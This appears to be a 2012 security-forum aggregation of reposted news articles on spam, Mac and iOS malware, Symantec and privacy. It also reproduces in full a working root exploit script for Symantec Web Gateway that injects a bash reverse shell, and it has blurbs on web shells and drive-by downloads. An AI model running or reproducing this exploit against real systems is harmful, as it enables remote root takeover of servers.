Wubi

NYC Traffic Ticket spam is really Blackhole malware attack | Naked Security by Graham Cluley on July 25, 2012 Don't be too quick to believe that the New York State police are charging you with a traffic offence - that email you just opened in your inbox could actually be an attempt to infect your computer. The team at SophosLabs have been intercepting a malicious spam campaign today which tries to trick the recipient into believing that they were caught speeding. Here's what a typical email used in the attack looks like: Of course, if you have your head on straight you might ask yourself how the New York police could possibly have your email address (or at least how they would have connected it to your car). Or you might realise that the message is clearly spam as you weren't anywhere near New York on the day in question. But plenty of people won't have their head on straight, and - in their fluster - might click on the link without thinking. That's what the cybercriminals are banking on. Malware authors have used a very similar disguise in the past, tricking users into opening a dangerous attachment. On this occasion, however, there is no attachment. Instead, a link takes users to a website playing host to the Blackhole exploit kit - within seconds visiting computers can be infected via Adobe Flash and PDF exploits, detected by Sophos products as Troj/SWFExp-AI and Troj/PDFEx-GD. We've certainly seen lots of attacks involving the Blackhole exploit kit lately, including rejected wire transfer notifications and fake Facebook photo tag notifications. Keep your anti-virus software up-to-date, your operating system and applications patched, and - essentially - your wits about you. Hat-tip: Thanks to SophosLabs researcher Przemek Miozga for his assistance with this article. Sursa: NYC Traffic Ticket spam is really Blackhole malware attack | Naked Security

In orice caz, e o lectie importanta pe care multi ar trebui macar sa o asculte si sa traga concluzii. Probabil e veche, si probabil a mai fost abordat subiectul. Dar calitatea nu expira niciodata. Nu are termen de valabilitate. Merita vazut. Merita macar vazut.

Uita`ti`va. Merita. Aveti ce invata. Eu sincer, am fost intr`adevar impresionat.

Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit [table=width: 500, class: grid] [tr] [td]EDB-ID: 20088[/td] [td]CVE: 2012-*?2953 [/td] [td]OSVDB-ID: N/A[/td] [/tr] [tr] [td]Author: muts [/td] [td]Published: 2012-07-24[/td] [td]Verified: [/td] [/tr] [tr] [td]Exploit Code: [/td] [td]Vulnerable App: [/td] [td][/td] [/tr] [/table] #!/usr/bin/python import urllib import sys ''' print "[*] ##############################################################" print "[*] Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit" print "[*] Offensive Security - http://www.offensive-security.com" print "[*] ##############################################################\n" # 06 Jun 2012: Vulnerability reported to CERT # 08 Jun 2012: Response received from CERT with disclosure date set to 20 Jul 2012 # 26 Jun 2012: Email received from Symantec for additional information # 26 Jun 2012: Additional proofs of concept sent to Symantec # 06 Jul 2012: Update received from Symantec with intent to fix # 20 Jul 2012: Symantec patch released: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120720_00 # 23 Jul 2012: Public Disclosure ''' if (len(sys.argv) != 4): print "[*] Usage: symantec-web-gateway-0day.py <RHOST> <LHOST> <LPORT>" exit(0) rhost = str(sys.argv[1]) lhost = sys.argv[2] lport = sys.argv[3] payload= '''echo%20'%23!%2Fbin%2Fbash'%20%3E%20%2Ftmp%2FnetworkScript%3B%20echo%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F'''+lhost+'''%2F'''+lport+'''%200%3E%261'%20%3E%3E%20%2Ftmp%2FnetworkScript%3Bchmod%20755%20%2Ftmp%2FnetworkScript%3B%20sudo%20%2Ftmp%2FnetworkScript''' url = 'https://%s/spywall/pbcontrol.php?filename=hola";%s;"&stage=0' % (rhost,payload) urllib.urlopen(url)

Symantec names Bennett CEO; Q1 solid, outlook light | ZDNet Summary: Former Intuit chief Steve Bennett takes over as CEO of Symantec. Can the security vendor juice growth and fend off critics? By Larry Dignan for Between the Lines | July 25, 2012 -- 14:19 GMT (07:19 PDT) Steve Bennett, Chairman of Symantec, is in as CEO of the security software company. Enrique Salem is out after Symantec's board determined that the company just wasn't getting the performance it needed. In a statement, Symantec said that there was no one particular reason for Salem's departure. Bennett noted that "it was the board's judgment that it was in the best interests of Symantec to make a change in the CEO." Bennett also noted that Symantec's assets are strong yet underperforming. Bennett added that the company would "build upon the significant assets in place to help Symantec accelerate value creation for all of its stakeholders." Shares of Symantec gained nearly 15 percent after the announcement on hopes for better quarterly performance. Symantec's earnings results have been hit or miss relative to Wall Street estimates. In addition, Symantec's storage unit and security division rarely seem to be in sync in terms of financial performance. Stifel Nicolaus analyst Todd Weller said in a research note: Indeed, Bennett has a good track record. Bennett joined Symantec's board in 2010 and became chairman a year later. He had been CEO of Intuit from 2000 to 2007 and was an exec at General Electric. Barclays analyst Raimo Lenschow said Symantec could have been a good target for activist investors, which have targeted BMC and CA. These activists prod companies to make better use of their cash and deliver more value to investors. Symantec didn't offer a dividend, but had plenty of cash. The move to name Bennett CEO indicates Symantec is ready to shake things out without outside prodding. Returns on Symantec shares lagged the S&P 500 year to date and trailed the stock performance of most enterprise software peers. Separately, Symantec reported fiscal first quarter earnings of $172 million, or 24 cents a share, down from $191 million a year ago. Revenue for the first quarter was $1.67 billion, up 1 percent from a year ago. Non-GAAP earnings per share were 43 cents in the first quarter. Wall Street was looking for 38 cents a share on revenue of $1.65 billion. Overall, Symantec's units delivered flattish to single digit growth rates. The consumer business fell 1 percent from a year ago, security and compliance was up 7 percent and storage and server management fell 2 percent. As for the second quarter outlook, Symantec projected non-GAAP earnings between 35 cents a share and 39 cents a share. Symantec also said that second quarter revenue will be between $1.63 billion and $1.66 billion. Wall Street was looking for earnings of 40 cents a share on revenue of $1.69 billion. Bennett's challenge will be stringing together a series of better-than-expected quarters. Sursa: Symantec names Bennett CEO; Q1 solid, outlook light | ZDNet

No, Microsoft and Skype are not playing Big Brother | ZDNet Summary: If all you have is tinfoil, everything looks like a conspiracy. But it's hard to work up even a mild case of paranoia about your personal communications if you actually read Skype's Privacy Policy from start to finish. By Ed Bott for The Ed Bott Report | July 25, 2012 -- 12:55 GMT (05:55 PDT) My colleague Steven J. Vaughan-Nichols wants you to be afraid of Skype. Very afraid. “Big Brother Microsoft,” he says, “listens in to your Skype IMs.” Oh my goodness, this is simply awful. Or at least one would think so, unless you read the parts of the Skype Privacy Policy that Mr. Vaughan-Nichols conveniently omitted from his inflammatory report. I’ve read that document carefully. You can too. When you do, you'll see that there's not much to fear. The ginned-up controversy involves two sections. First is the preamble to section 1: Skype may gather and use information about you, including (but not limited to) information in the following categories… That’s followed by a long list of data types that you must, by definition, share with a communication service of which you are a member. Things like your name and e-mail address, which you enter into your profile. Your list of contacts. The payment information you’ve stored with Skype (your credit card number, for example) so that you can make international calls at a few cents per minute. And then there’s the item in section (n), which is conveniently bold-faced in Steven’s post so that you know exactly what he wants you to be scared about: (n) Content of instant messaging communications (please see section 12) Wait, what? Someone at Microsoft is reading your instant messages in Skype? Well, no. Let’s ignore the fact that the only reason most ordinary people uses Skype IMs is to coordinate the audio and video portion of the call with the person on the other end. My Skype IM history mostly contains messages like “Hey, plug in your webcam so we can talk, OK?” But it’s a reasonable question to ask. Why on earth would Skype want to “gather and use … the content of instant messaging communications” by its subscribers? That question is answered, directly, in Section 2, which immediately follows the list in section 1. It is headlined, in bold: HOW DOES SKYPE USE THIS INFORMATION AND FOR WHAT PURPOSE? Our primary purpose in collecting information is to provide you with a safe, smooth, efficient, and customized experience. Skype collects and uses, or has third party service providers acting on Skype’s behalf collecting and using, personal data relating to you, as permitted or necessary to… That in turn is followed by a list of 14 reasons, none of which are controversial. In fact, the very first item on the list answers the question thoroughly. Skype gathers and uses that information to “provide internet communication, video sharing and other products in particular to convey the communications and videos you and others make by means of the Skype software and/or the Skype products.” Right. When you type words into a communication service, those words have to be "gathered and used" as they are passed from node to node along the network of computers that make up Skype’s network. It’s the same reason that you have to give an online storage provider the right to copy and use files you store in the cloud—because they need that right in order to provide you with the service you signed up for. In Steven’s post, he highlights a small part of section 12: Skype currently keeps your instant messages “for a maximum of 30 days unless otherwise permitted or required by law. Voicemail messages are currently stored for a maximum of 60 days unless otherwise permitted or required by law.” So let’s be logical here. Why on earth would a service want to retain this data for 30 days? Perhaps it would make more sense if we read the section in its entirety instead of selectively editing it. Maybe that will answer the question: Retention of Instant Messages (Skype internet communications software application only) Your instant messaging (IM) communications-content may be stored by Skype (a) to convey and synchronise your messages and ( to enable you to retrieve the messages and history where possible. IM messages are currently stored for a maximum of 30 days unless otherwise permitted or required by law. Voicemail messages are currently stored for a maximum of 60 days unless otherwise permitted or required by law. Skype will at all times take appropriate technical and security measures to protect your information. By using this product, you consent to the storage of your IM communications as described above. [emphasis added] Oh. So the service needs to store my messages in order to synchronize my messages and allow me to retrieve them on different devices. So if I have a conversation with you on my desktop PC and then go on the road with my notebook or iPad or mobile phone, I can sign in to my Skype account and we can pick up where we left off? Even if that last conversation was two or three weeks ago? That doesn’t seem so nefarious. Skype also discloses that it will store voicemail messages. Well, of course they will. That’s how voicemail works. This whole controversy started last week when a writer at Slate tried to spin gold out of the stuff you find on the floor of a barn. No, not straw. The other stuff: [W]hen I repeatedly questioned the company on Wednesday whether it could currently facilitate wiretap requests, a clear answer was not forthcoming. Citing “company policy,” Skype PR man Chaim Haas wouldn’t confirm or deny… Hello? Spokespersons for big companies aren't normally allowed to comment on sensitive legal issues. If I had a nickel for every time someone at Microsoft or Apple or Google or Facebook gave me a boilerplate official response and declined further comment, we could have one very lavish party. Look, if you are concerned about the privacy or security of any kind of communications over the Internet, you should think twice about using a widely available commercial service designed for consumers. That’s true of email, any voice-over-IP service, and any form of instant messaging. (Microsoft does offer a business-class secure messaging service called Lync.) If you are worried that any of those communications might be of interest to a law enforcement agency, then you should invest in a secure, encrypted channel. You should not use Skype or Facebook chat or Google Voice. That's Privacy 101. On the other hand, if you want to chat with your grandkids who live across the country, or you want to catch up with an old friend who moved to Thailand, or you want to have a face-to-face chat with your spouse from your hotel room after a long day of business travel, you should feel completely comfortable using Skype. You certainly shouldn't be afraid. Meanwhile, in the interest of telling the rest of the story, I’ve asked Facebook, Google, and Microsoft for an update on their specific privacy policies for their chat services and will do a follow-up post after I hear back. Sursa: No, Microsoft and Skype are not playing Big Brother | ZDNet

Taxi drivers told to stop snooping on passengers | ZDNet Summary: Southampton cab owners can no longer be forced to make video and audio recordings of everything their customers do and say, the ICO has said By Tom Espiner | July 25, 2012 -- 12:35 GMT (05:35 PDT) Cab drivers in Southampton must stop videoing and recording their passengers' conversations, the UK's privacy watchdog has ordered. Since 2009, taxis in Southampton have had to constantly record all journeys using CCTV and audio equipment, a mandatory requirement by local authorities. On Wednesday, the Information Commissioner's Office (ICO) published an enforcement notice telling Southampton City Council to put a halt to the practice by 1 November. Southampton City Council "went too far" in having taxis record all passenger conversations on video and audio, the ICO has said. "By requiring taxi operators to record all conversations and images while the vehicles are in use, Southampton City Council have gone too far," information commissioner Christopher Graham said in a statement. "We recognise the council's desire to ensure the safety of passengers and drivers, but this has to be balanced against the degree of privacy that most people would reasonably expect in the back of a taxi cab," he added. The council's policy was a breach of the Data Protection Act, the ICO said, noting that recording all conversations was out of proportion to the "very low" amount of trouble seen by taxi drivers. It is also important to stop the recording because many drivers use their vehicles outside work, according to Graham. "By requiring taxi operators to record all conversations and images while the vehicles are in use, Southampton City Council have gone too far" — Christopher Graham, ICO Southampton covers an area of 51.81 square kilometres, with a population of about 239,700. While it could not give figures on how many people had been recorded in Southampton taxis over the three-year period, it did say a sizeable proportion could have been affected. In 2009 Southampton City Council said the CCTV would be rolled out to 800 cabs. A city spokesman told ZDNet that not all of those 800 taxis had been fitted with CCTV. "We hope this action sends a clear message to local authorities that they must properly consider all the legal obligations on them before requiring the installation of CCTV or similar equipment and that audio recording should be very much the exception, rather than the rule," Graham said. Southampton City Council has not said whether it will appeal or comply with the notice. The ICO recently stopped Oxford City Council from implementing a similar taxi surveillance policy, it said on Wednesday. Sursa: Taxi drivers told to stop snooping on passengers | ZDNet

Apple releases OS X 10.8 Mountain Lion: What you need to know | ZDNet Summary: OS X 10.8 Mountain Lion was released Wednesday after a year in development. Out with a slew of new features, here's what you need to know, as well as a roundup of ZDNet and CNET's coverage. By Zack Whittaker for Between the Lines | July 25, 2012 -- 11:44 GMT (04:44 PDT) Cue the fanfare. Apple released OS X 10.8 Mountain Lion at long last, after more than a year in development. First announced in February, third-party application developers have spent months preparing for the release. Despite the release dubbed as a minor upgrade to the older 10.7 "Lion," Apple has included a number of new features to revitalize Mac sales ahead of Microsoft's Windows 8 launch later this year. With greater iCloud integration, Messages, and social sharing, along with a brand new Notification Center, Apple continues the "iOS-ification" of its desktop operating system to bring it closer in line with its mobile cousins. Mountain Lion is now available in the Mac App Store for $19.99 in the U.S., £13.99 in the U.K., and €15.99 in Europe. Most modern Macs, MacBooks, and Mac minis will be able to download the operating system, and those who bought new Apple hardware in the past month will receive a free upgrade. Here's a roundup of what you need to know, from ZDNet and sister-site CNET: Apple's Mountain Lion: Another step toward iOS, Mac feature unification Larry Dignan: It's not immediately clear what Apple's Mac OS speedy cadence and feature unification with iOS will mean for business users. Sursa: Apple releases OS X 10.8 Mountain Lion: What you need to know | ZDNet

Jail for man who tricked women into taking hacked webcams into shower | Naked Security by Graham Cluley on July 25, 2012 For a long time perverts and cyberstalkers have been getting kicks out of secretly snooping on female victims via webcams. There's clearly a type of man (sorry for being sexist, but all the examples I have found online have male culprits) who gets a thrill out of secretly spying on young women in their bedrooms. In the most harrowing cases young women are actually blackmailed into posing naked by hackers threatening to distribute compromising photos. Pretty sick stuff. Which brings us to 21-year-old Trevor Harwell, of Fullerton, California, who has just been jailed after he installed spyware onto victims' laptops, and displayed a bogus error message to increase the chances of capturing nude pictures and movies. "You should fix your internal sensor soon. If unsure what to do, try putting your laptop near hot steam for several minutes to clean the sensor." As we reported last year, Harwell's scheme successfully tricked a number of young women into taking their laptops into their bathroom while taking a steamy shower. Thousands of secretly taken taken still images, videos and cellphone videos were found on Harwell's computer, who had plenty of opportunity to install the spying software onto his prospective victims' computers, because he worked part time as a "friendly" computer repairman. Of course, there was nothing to prevent a snooped-upon victim being under-age. It's true for people of any age, but young people's PCs must be properly protected with the latest anti-virus software, security patches and firewalls. It is also essential that young people are taught how to behave safely online, to avoid being exploited by sick-minded hackers. Find out more about how to protect children from online threats at www.getsafeonline.org Find out about the Virtual Global Taskforce - a group of police forces working around the world to fight online child abuse Harwell was sentenced to one year in the Anaheim City Jail, five years of formal probation, and has been ordered to complete a Sex Offender Treatment program. You can make up your own joke about how he better be careful in the jail's showers.. Sursa: Jail for man who tricked women into taking hacked webcams into shower | Naked Security

July 25, 2012 By Black X-Ray scans your Android device to determine whether there are vulnerabilities that remain unpatched by your carrier. The X-Ray app presents you with a list of vulnerabilities that it is able to identify and allows you to check for the presence of each vulnerability on your device. Features of X-Ray Safely scan for vulnerabilities on your Android phone or tablet Assess your mobile security risk Keep your carrier honest X-Ray was developed by the security experts at Duo Security. We hope that X-Ray will empower users with knowledge of vulnerabilities on their devices and allow them to take action to improve their security. We encourage users to contact their carriers and ask for their devices to be patched. X-Ray has detailed knowledge about a class of vulnerabilities known as “privilege escalation” vulnerabilities. Such vulnerabilities can be exploited by a malicious application to gain root privileges on a device and perform actions that would normally be restricted by the Android operating system. A number of such vulnerabilities have been discovered in the core Android platform, affecting nearly all Android devices. Even more have been discovered in manufacturer-specific extensions that may affect a smaller subset of Android users. Unfortunately, many of these privilege escalation vulnerabilities remain unpatched on large populations of Android devices despite being several years old. If there are vulnerabilities present on your device that are not patched, a malicious application may exploit the vulnerabilities to gain full, unrestricted control over your Android device. While the apps you install from the Google Play store are normally restricted by the permissions you grant them and constrained by the Android sandbox, these vulnerabilities allow a malicious application to escalate privileges to a root/superuser privilege and perform any action they desire without you knowing. The good thing of X-Ray is instead of trying to detect all the possible malicious apps in the universe, X-Ray takes a different approach and seeks out the known vulnerabilities in the underlying mobile platform itself. X-Ray doesn’t care whether the apps on your device are good or bad, it only cares whether there are vulnerabilities present that bad apps often exploit to gain full control of your device. Download X-Ray: X-Ray Sursa: X-Ray a Tool to scan Android for unpatched vulnerabilities — PenTestIT

Description: Java Drive-by Download a method in which an attacker crafts a webpage with java drive by codes and when someone visits the page, an executable which may be a RAT, worm or a virus is downloaded and executed in his system without his permission and knowledge. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: In this video you will learn how to upload a shell on the website after uploading what can you do with website it's up to you what you want to do. This video will give you one idea how the shell works and what can you do with that trick. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: In this video you will learn how to create fake access point using one Script called FAKEAP_PWN you can download that script from here g0tmi1k: [script] fakeAP_pwn (v0.3). You will find lots of information about this script in this site that I have posted. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: This video is all about how you can recover all street Assess point for fun or profit and information, how to bind all information on Google Earth so you can view all your information graphically. In this video he will shows how to setup all this things like Bluetooth, Wireless Card, and how to use Kismet tool for capturing traffic from the street. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: In this video you will learn Bash scripting for multiple command. Sometimes we want to use same command again and again and that was just waste of time but how to make that things automating with one script so this is good video for making your own bash script and lots of new tricks that you will know watching this video. If you don''t know what is Bash shell please Read this Wikipedia Link Bash (Unix shell) - Wikipedia, the free encyclopedia Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Sneaking security into Telstra, Macquarie Bank | ZDNet Summary: How do you implement security when company executives only see it as a cost? Perhaps it can be snuck into the business without anyone really knowing, just like malware. By Michael Lee | July 25, 2012 -- 07:22 GMT (00:22 PDT) Raising awareness of security means getting the top executives on-board, but with security often seen as a cost or impediment, some have had better success by slowly sneaking security into the business through other means. Speaking at the Security 2012 conference in Sydney today, Occams Razor director Nicholas Martin recollected how during his tenure at Telstra as its general manager of security strategy, and then as Macquarie Bank's head of corporate security, he had to use alternative methods to drill security through to the executive level of both companies for their own good. Martin's story with Telstra began with its CEO David Thodey, who at the time was in charge of the telco's largest division: enterprise and government. The division at the time was experiencing difficulties, not only on the commercial aspects, but also in how it complied with its regulatory responsibilities. "The strategy was, 'let's go to David Thodey', whose single biggest customer group was the government at the time, and talk to him about how we can work with him and his broader team, trying to coordinate and interface with government," Martin said. Martin essentially played the audit-compliance blackjack card, just as ING Direct recently did, promising that security could help make these problems go away. "We essentially pitched it to him. We could come in [and] help him coordinate across regulatory and commercial. We could also be involved in any major bids." These bids included Westfield's move to Telstra's datacentre. Martin would effectively use security as a means to provide the retail giant with assurances, as well as answer any questions related to the safety of data. However, Martin said that the process requires patience, stating that it took two years before he felt that Telstra had a security program in place that he was comfortable with. It also meant changing the organisation's security focus. Telstra had previously placed emphasis on anti-terrorism activities after the events of 11 September 2001, but the money that was being spent in this area wasn't actually making the organisation any safer. Instead, Telstra's security slowly transformed to focus on identify theft and fraud, as they were the real risks affecting the business, and ones that it could do something about. The younger Macquarie Bank, in contrast, was normally seen as being more agile due to its rapid growth. However, according to Martin, with its youth came a lack of the experience in security incidents and issues, and this meant that it simply didn't have the appetite or see the need for a large, heavy security program. "For me to go to them and say, 'Let's implement a Telstra-style program' to the organisation wasn't going to work," Martin said, recalling that he needed to find a different strategy for the executives. "I found that the best strategy to try and get security in front of the senior team there and get their support was mainly around the executive protection program." Although Macquarie Bank's executives weren't in any immediate danger, Martin realised that their personal lives were often under scrutiny by shareholders and the media whenever a financial report was released. Martin enlisted the help of the head of Macquarie Capital at the time, Nicholas Moore, who went on to become Macquarie Group's CEO, and used the media's scrutiny to raise awareness about security. "I used that as a mechanism to talk to them about [the executive protection program] and that was my avenue into them. We ran reverse due diligence on all of the executive team just to show them what the members of the public could actually find out about them legitimately. Once we got their trust that we were supporting them, then we were able to then build whole other layers of security where we thought we needed it." Martin did admit, however, that even with this trust, it was up to the executives at the end of the day as to whether they wanted to follow his advice. He recalled the actions of one particular banker whose office window sat across from the Commonwealth Bank's building. "You could actually look out of the Commonwealth Bank, through his office window, and with a pair of binoculars you could pretty much read his computer screen. If you wanted to ... you [could use] directional microphones and all that [and] probably hear all the conversations," he said, recalling the conversation he had with the banker. The response he received was, "Why would anyone want to hear about the rubbish I talk about each day?" "Sometimes you've got to go with what they feel and believe, unless you can really articulate the threat and the risk they're facing." Sursa: Sneaking security into Telstra, Macquarie Bank | ZDNet

Mac malware Crisis on Mountain Lion eve? | Naked Security by Paul Ducklin on July 25, 2012 SophosLabs recently received a intriguing Mac malware sample, variously known as Crisis and Morcut. We're still digging into the details of the malware itself, but the delivery mechanism is interesting. The malware package arrived in a file named AdobeFlashPlayer.jar. JAR stands for Java Archive. JAR files, which are structurally just ZIP files with a special name, are used as a standardised way of packaging and delivering Java software. This makes it easy to deliver a Java program along with all the programming libraries, configuration data, images and other supporting stuff it needs. nside the malicious AdobeFlashPlayer.jar is a .class file named WebEnhancer, and two unassuming-looking files named win and mac. Class files are to Java what EXE files are to Windows - they're the compiled software components which run inside the Java Virtual Machine (JVM). Unlike EXE files, however, they are inherently multi-platform. The same .class file will run on OS X and Windows, for example, with the JVM providing the platform-specific software layer. And cross-platform support is what the malware author is after here. The WebEnhancer program file has nothing to do with web browsing - instead, it simply works out whether you have Windows or OS X, and chooses between the win and mac files. WebEnhancer is implemented as an applet: a special sort of Java program that runs inside a Java-enabled browser. The author's inventiveness obviously ran out at this point: win is an installer for Windows malware (detected by Sophos as Mal/Swizzor-D), whilst mac is an installer for the Crisis, or Morcut, malware for OS X (detected by Sophos as OSX/Morcut-A). The good news is that the WebEnhancer applet causes a digital signature alert. This warns you that the applet is from an untrusted publisher, and reminds you that "this application will run with unrestricted access which may put your personal information at risk." Of course, the Morcut malware itself doesn't have to be delivered inside a JAR file - but the sample I looked at was packaged that way. We'll let you know what we find as we dig into the Morcut malware. A cursory examination suggests that it's going to be interesting (I was going to say "fun", but that sounds all wrong!) for the analyst who got the job. Morcut has kernel driver components to help it hide, a backdoor component which opens up your Mac to others on your network, a command-and-control component so it can accept remote instructions and adapt its behaviour, data stealing code, and more. So, watch this space for further details if you're interested in the guts of modern Mac malware, and don't forget: Cybercrooks now consider Mac users to be worthwhile victims. Malware can easily target multiple platforms. WebEnhancers often aren't. If you don't need Java, uninstall it. That leaves one less convenience for malware writers. Don't blindly ignore certificate warnings. Don't feel left out if you're a Linux user. Oh, and if you don't yet have anti-malware on your Mac, why not try the free Sophos Anti-Virus for Mac Home Edition? (No registration, no password, no expiry. We don't even ask for an email address.) If you're planning on picking up a brand new Mac when Mountain Lion drops later today, why not start off secure? Sursa: Mac malware Crisis on Mountain Lion eve? | Naked Security

Windows malware found in iOS App Store. Say what?! | Naked Security by Joshua Long on July 25, 2012 It hasn't been a great week so far for Apple security. The discovery of new, low-distribution Mac malware known as Crisis or Morcut would be bad enough news, just before the launch of Mountain Lion. But, alas, there's another security issue: an iOS app in the App Store was found to contain malicious Windows executable files. The malware was initially found by a user of the Apple Support Communities discussion board who downloaded an app called "Instaquotes-Quotes Cards For Instagram" from iTunes, only to have his antivirus software tell him that it contained a worm. Initially thought to be a false positive, it turned out that there was in fact actual Windows malware embedded inside the app. The malware known by Sophos products as Mal/CoiDung-A, is identified as Worm.VB-900 by ClamAV and Worm:Win32/VB.CB by Microsoft. CNET reports that Apple removed the Instaquotes app from the iOS App Store on Tuesday within hours of the malware's discovery. According to a MacRumors report, the app had been in the App Store since 19 July and its price had temporarily dropped from $0.99 to free this past weekend. It is unknown how many users downloaded the app while it was available in the store. It's also not entirely clear whether the malware's inclusion inside the app was deliberate or not - but in all probability this was an accidental infection caused by an infected developer's computer. The good news is that the malware can't actually run on a Windows PC without first being extracted from the iOS application package, so it is unlikely to have caused any actual damage to any users' systems. Earlier this month, Apple made the mistake of approving another questionable iOS app. In that case, the app itself engaged in nefarious behavior and was thus deemed by some to be malware. That app, known as Find and Call, collected contact information from phones on which it was installed, sent this information in plain text over HTTP, and then sent SMS text message spam to the user's contacts, all without warning the user or asking for permission. There's a major difference between Instaquotes and Find and Call, though. While Find and Call actually grabbed your data, the malware embedded in Instaquotes cannot cause any direct harm to Apple devices that run iOS. Nevertheless, this is twice in a single month when Apple's infamous app review process has neglected to stop bad things from getting inside the iOS "walled garden." Perhaps what's most disappointing about the discovery of Windows malware inside an iOS app is that Apple doesn't seem to have conducted a simple virus scan as part of its app vetting process. Just extracting all files from the package, and scanning them with anti-virus software, would have prevented the Windows malware from getting into the iOS App Store in the first place. As I discussed in detail last month, Apple could be doing a lot better job at vetting apps and improving the overall security of the iPhone, iPad, and App Store. Sursa: Windows malware found in iOS App Store. Say what?! | Naked Security

July 25, 2012 By Mayuresh Our first post regarding the Cuckoo Sandbox can be found here. A few hours ago, an update –Cuckoo Sandbox version 0.4 was released! This release can be considered to be a historical milestone in the project’s history and the best release to have been produced so far! This is a complete rewrite of every single component from scratch with modularity, scalability and flexibility in mind. “Cuckoo Sandbox is a malware analysis system. Its goal is to provide you a way to automatically analyze files and collect comprehensive results describing and outlining what such files do while executed inside an isolated environment. It’s mostly used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine. But it can do much more!” Cuckoo Sandbox 0.4 official change log: Modules for performing custom post-analysis processing of the results and generating reports: being able to customize the interpretation of the results and the generation of reports in any format you want, you can easily integrate Cuckoo Sandbox in any existing framework or environment you already have in place. Default support for KVM and the ability to create new, or modify existing, Python modules that will instruct Cuckoo Sandbox on how to interact with your virtualization solution of choice. A signatures engine that you can use to identify and isolate any pattern or event of interest: contextualize the analysis results, quickly identify known malwares or look for particularly interesting events for you or your company. Improved scripting capabilities, further customizing the sandbox to your analysis needs. You can now customize Cuckoo’s analysis process to the best extent by simply writing Python modules that define how the Cuckoo Sandbox should interact with the malware and the analysis environment. Last but not least, the Cuckoo Sandbox analysis core was completely re-engineered. This will significantly improve the quality of our analysis, giving much more detailed and explicative information about the malware you’re analyzing. Download Cuckoo Sandbox: Cuckoo Sandbox v0.4 - cuckoo_0.4.tar.gz Sursa: Cuckoo Sandbox version 0.4! — PenTestIT

Android Hackers will demonstrate Fully loaded Spying Applications & Mobile Botnet | The Hacker News Posted On 7/25/2012 01:04:00 PM By THN Security Analyst This Sunday, The Capital , New Delhi plays host to an International The Hackers Conference where blackhat hackers will discuss the challenges of cyber safety with security agencies. Your smartphone is an always-on and always-connected digital extension of your life which will be used by attackers to covertly steal your sensitive data and spy on you. Mahesh Rakheja , An Independent Security Researchers and Android Developer/Hacker will demonstrate "Android Spy Agent". This application allows us to remotely access the entire victim’s personal information and even though the confidential data available in the android cell phone. The type of personal information include the victim’s contacts, call logs, messages, browser’s history, GPS location and many more information directly available on the victim’s cell phone. Many-a-times we think that is there any way by which we can read the private sms of anyone. So here is the solution Mr. Mahesh will present in The Hackers Conference 2012 platform with Hundreds of advance features. This application can also allows the attacker to remotely delete the data available on the victim’s phone. In order to perfectly work this application you have to gain access to the victim’s android cell phone for at least 20 seconds. You have to install the application and then restart the cell phone. After restart your application get automatically starts on the victim’s cell phone. Now you can access the victim’s cells information for any normal cell phone and get the response on it. The android spy agent will be hidden in the victim’s cell phone and not allows the victim to easily uninstall or delete it from the cell. In Another Talk Android Hacker Aditya Gupta and Subho Halder will talk about "All your Droids belong to me : A look into Mobile Security in 2012". Researchers have developed and will Demonstrate malware for Android phones that can be used as a spam botnet. "The talk is about Android Malwares, Botnets and all the crazy stuff you have been hearing in the past. We will give an inside view on how the black hat underground uses this, to earn 5-6 digit income per month . For this, We will start off with creating an Android Malware, and then will gradually move on to the Botnet Part.", Aditya Gupta said. Maintaining that a wide variety of services is being offered on the mobile platforms without proper security implementation, Anurag Kumar Jain and Devendra Shanbhag from Tata Consultancy Services will deliberate on the topic, "Mobile Application Security Risk and Remediation". They will highlight the need for application security in mobile applications, the threats in a mobile environment, key security issues that can creep in mobile applications, and suggests a secure development approach which can possibly safeguard mobile applications from becoming “sitting ducks” for attackers and mobile malware. Experts from countries like Iran and Argentina will share space with Indian speakers in the day-long discussion at the India Habitat Centre. Yet another important issue The Hackers Conference 2012 will deliberate on is the Internet censorship in India. For more details, go to www.thehackersconference.com Sursa: Android Hackers will demonstrate Fully loaded Spying Applications & Mobile Botnet | The Hacker News

Security researchers will disclose vulnerabilities in Embedded, ARM, x86 & NFC | The Hacker News Posted On 7/25/2012 12:33:00 PM By THN Security Analyst Security researchers are expected to disclose new vulnerabilities in near field communication (NFC), mobile baseband firmware, HTML5 and Web application firewalls next week at the Black Hat USA 2012 security conference. The Black Hat session aim to expose sometimes shocking vulnerabilities in widely used products. They also typically show countermeasures to plug the holes. Two independent security consultants will give a class called "Advanced ARM exploitation," part of a broader five-day private class the duo developed. In a sold-out session, they will detail hardware hacks of multiple ARM platforms running Linux, some described on a separate blog posting. The purpose of the talk is to reach a broader audience and share the more interesting bits of the research that went into developing the Practical ARM Exploitation and presenters Stephen Ridley and Stephen Lawler demonstrate how to defeat XN, ASLR, stack cookies, etc. using nuances of the ARM architecture on Linux. In addition to mobile and Web security, Black Hat presentations will also cover security issues and attack techniques affecting industrial control systems, smart meters and embedded devices. Sursa: Security researchers will disclose vulnerabilities in Embedded, ARM, x86 & NFC | The Hacker News

